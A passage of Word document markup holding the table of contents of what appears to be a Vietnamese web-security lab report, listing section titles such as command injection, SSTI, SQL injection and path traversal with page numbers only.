              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A7E86B2" w14:textId="4341A58D" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909872" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mô tả lỗ hổng</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909872 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23023554" w14:textId="4791A1A4" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909873" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Biện pháp ngăn chặn</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909873 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="26C4A91D" w14:textId="42B619DC" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909874" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kịch bản tấn công thực hành</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909874 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>62</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61988FF4" w14:textId="16104DC6" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909875" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bài thực hành – Lab 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909875 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>62</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34D77C5A" w14:textId="20B8377B" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909876" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bài thực hành – Lab 2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909876 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>66</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49CA5413" w14:textId="1AF066B8" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909877" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>B01: Command Injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909877 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>70</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="72082C66" w14:textId="11150C6B" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909878" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>B02: Server-Side Template Injection (SSTI)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909878 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>72</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E9C3A8B" w14:textId="7FC2088F" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909879" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>B03: Sensitive Data Exposure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909879 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>76</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A7EB925" w14:textId="20E3A2F1" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909880" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>B04: Using Components with Known Vulnerabilities</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909880 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>78</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A918154" w14:textId="70627B9A" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909881" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>B05: Insecure Deserialization</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909881 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>82</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B1B58E4" w14:textId="211D4885" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909882" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>C01: SQL injection attack, listing the database contents on Oracle</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909882 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>86</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="632E19D0" w14:textId="2AC0AFEF" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909883" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>C02: File path traversal, traversal sequences blocked with absolute path bypass</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909883 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>90</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7AA12B7B" w14:textId="63485E95" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909884" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>C03: Multi-step process with no access control on one step</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909884 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>92</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="140E159B" w14:textId="1117B7BC" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909885" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>C04: Source code disclosure via backup files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909885 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>95</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B5FA1F6" w14:textId="3A4744EC" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909886" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>C05: Client-side prototype pollution via browser APIs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909886 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>98</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1ED56596" w14:textId="7B91B423" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909887" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>C06: Password brute-force via password change</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
